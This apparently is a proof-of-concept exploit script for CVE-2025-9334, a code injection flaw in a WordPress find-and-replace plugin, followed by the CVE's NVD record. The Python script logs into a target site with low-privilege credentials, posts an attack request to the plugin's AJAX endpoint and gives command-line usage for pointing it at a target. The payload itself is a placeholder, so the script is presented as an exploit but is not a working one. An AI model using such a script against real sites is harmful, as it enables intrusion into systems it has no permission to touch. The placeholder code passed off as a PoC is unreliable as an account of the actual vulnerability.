CVE-2025-9334

import requests import sys # CVE-2025-9334 PoC - Authenticated Code Injection in WordPress Plugin # Target: Better Find and Replace Plugin <= 1.7.7 def exploit(target_url, username, password, proxy=None): """ Exploit the rtafar_ajax function to call arbitrary plugin methods. This PoC demonstrates calling a dangerous function via the vulnerable endpoint. """ session = requests.Session() proxies = {'http': proxy, 'https': proxy} if proxy else None # Step 1: Login to WordPress login_url = target_url.rstrip('/') + '/wp-login.php' login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data, proxies=proxies, verify=False) if 'wordpress_logged_in' not in str(session.cookies): print('[-] Login failed') return False print('[+] Login successful') # Step 2: Exploit the vulnerable AJAX endpoint ajax_url = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' # Example: Call arbitrary plugin function via action parameter # Replace 'plugin_function_name' with actual vulnerable function exploit_data = { 'action': 'rtafar_plugin_function_name', # Vulnerable parameter 'param1': 'malicious_value', # Malicious input 'param2': 'additional_payload' } resp = session.post(ajax_url, data=exploit_data, proxies=proxies, verify=False) if resp.status_code == 200: print('[+] Exploit request sent') print(f'[+] Response: {resp.text[:500]}') return True else: print(f'[-] Exploit failed with status: {resp.status_code}') return False if __name__ == '__main__': if len(sys.argv) < 4: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>') print('Example: python exploit.py http://target.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit(target, user, pwd)

{"cve": {"id": "CVE-2025-9334", "sourceIdentifier": "[email protected]", "published": "2025-11-08T06:15:41.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Better Find and Replace – AI-Powered Suggestions plugin for WordPress is vulnerable to Limited Code Injection in all versions up to, and including, 1.7.7. This is due to insufficient input validation and restriction on the 'rtafar_ajax' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to call arbitrary plugin functions and execute code within those functions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/actions/RTAFAR_CustomAjax.php#L29", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/admin/functions/DbReplacer.php#L507", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/real-time-auto-find-and-replace/trunk/core/lib/Util.php#L233", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3389979/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/232f3a15-3bd3-44fa-aa07-f055e8fcda88?source=cve", "source": "[email protected]"}]}}